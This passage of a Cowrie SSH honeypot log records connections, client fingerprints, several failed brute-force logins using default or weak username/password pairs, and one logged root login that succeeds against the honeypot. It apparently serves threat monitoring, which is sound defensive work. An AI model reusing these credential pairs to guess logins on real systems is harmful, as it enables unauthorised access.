dsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:12:38.404446Z","src_ip":"212.227.235.229","session":"dd0d5204eb49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44616,"dst_ip":"1.2.3.4","dst_port":22,"session":"e877172081e6","protocol":"ssh","message":"New connection: 212.227.235.229:44616 (1.2.3.4:22) [session: e877172081e6]","sensor":"my-vps","timestamp":"2025-08-26T04:12:39.896363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:12:39.899952Z","src_ip":"212.227.235.229","session":"e877172081e6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:12:40.167726Z","src_ip":"212.227.235.229","session":"e877172081e6"}
{"eventid":"cowrie.login.failed","username":"strycek","password":"st13ip","message":"login attempt [strycek/st13ip] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:41.863226Z","src_ip":"212.227.235.229","session":"dd0d5204eb49"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco123","message":"login attempt [cisco/cisco123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:42.728836Z","src_ip":"212.227.235.229","session":"e877172081e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36062,"dst_ip":"1.2.3.4","dst_port":22,"session":"96f347c66a8e","protocol":"ssh","message":"New connection: 212.227.125.160:36062 (1.2.3.4:22) [session: 96f347c66a8e]","sensor":"my-vps","timestamp":"2025-08-26T04:12:42.932339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:12:42.932976Z","src_ip":"212.227.125.160","session":"96f347c66a8e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T04:12:42.983998Z","src_ip":"212.227.125.160","session":"96f347c66a8e"}
{"eventid":"cowrie.login.failed","username":"webadmin","password":"1234567890","message":"login attempt [webadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:43.138151Z","src_ip":"212.227.125.160","session":"96f347c66a8e"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:43.484818Z","src_ip":"212.227.235.229","session":"dd0d5204eb49"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:44.041546Z","src_ip":"212.227.235.229","session":"e877172081e6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:44.191419Z","src_ip":"212.227.125.160","session":"96f347c66a8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38288,"dst_ip":"1.2.3.4","dst_port":22,"session":"f11f5b156940","protocol":"ssh","message":"New connection: 212.227.235.229:38288 (1.2.3.4:22) [session: f11f5b156940]","sensor":"my-vps","timestamp":"2025-08-26T04:12:46.540332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:12:46.693260Z","src_ip":"212.227.235.229","session":"f11f5b156940"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:12:46.936390Z","src_ip":"212.227.235.229","session":"f11f5b156940"}
{"eventid":"cowrie.login.failed","username":"user","password":"admin","message":"login attempt [user/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:49.135654Z","src_ip":"212.227.235.229","session":"f11f5b156940"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:50.794457Z","src_ip":"212.227.235.229","session":"f11f5b156940"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37958,"dst_ip":"1.2.3.4","dst_port":22,"session":"49ffc1e21f3e","protocol":"ssh","message":"New connection: 212.227.235.229:37958 (1.2.3.4:22) [session: 49ffc1e21f3e]","sensor":"my-vps","timestamp":"2025-08-26T04:12:54.781687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:12:54.807396Z","src_ip":"212.227.235.229","session":"49ffc1e21f3e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:12:55.196848Z","src_ip":"212.227.235.229","session":"49ffc1e21f3e"}
{"eventid":"cowrie.login.failed","username":"123456","password":"123456","message":"login attempt [123456/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:56.770295Z","src_ip":"212.227.235.229","session":"49ffc1e21f3e"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:58.021794Z","src_ip":"212.227.235.229","session":"49ffc1e21f3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34532,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9848857d095","protocol":"ssh","message":"New connection: 212.227.235.229:34532 (1.2.3.4:22) [session: d9848857d095]","sensor":"my-vps","timestamp":"2025-08-26T04:13:01.580559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:13:02.347435Z","src_ip":"212.227.235.229","session":"d9848857d095"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T04:13:02.348690Z","src_ip":"212.227.235.229","session":"d9848857d095"}
{"eventid":"cowrie.login.success","username":"root","password":"Kishi@123","message":"login attempt [root/Kishi@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:13:04.989786Z","src_ip":"212.227.235.229","session":"d9848857d095"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:05.521605Z","src_ip":"212.227.235.229","session":"d9848857d095"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37824,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c1d57d06895","protocol":"ssh","message":"New connection: 212.227.235.229:37824 (1.2.3.4:22) [session: 8c1d57d06895]","sensor":"my-vps","timestamp":"2025-08-26T04:13:10.496765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:10.758743Z","src_ip":"212.227.235.229","session":"8c1d57d06895"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:13:10.805770Z","src_ip":"212.227.235.229","session":"8c1d57d06895"}
{"eventid":"cowrie.login.failed","username":"open","password":"open","message":"login attempt [open/open] failed","sensor":"my-vps","timestamp":"2025-08-26T04:13:12.223226Z","src_ip":"212.227.235.229","session":"8c1d57d06895"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:13:13.494472Z","src_ip":"212.227.235.229","session":"8c1d57d06895"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53646,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9073f166b55","protocol":"ssh","message":"New connection: 212.227.235.229:53646 (1.2.3.4:22) [session: c9073f166b55]","sensor":"my-vps","timestamp":"2025-08-26T04:13:13.673221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:13:13.855675Z","src_ip":"212.227.235.229","session":"c9073f166b55"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh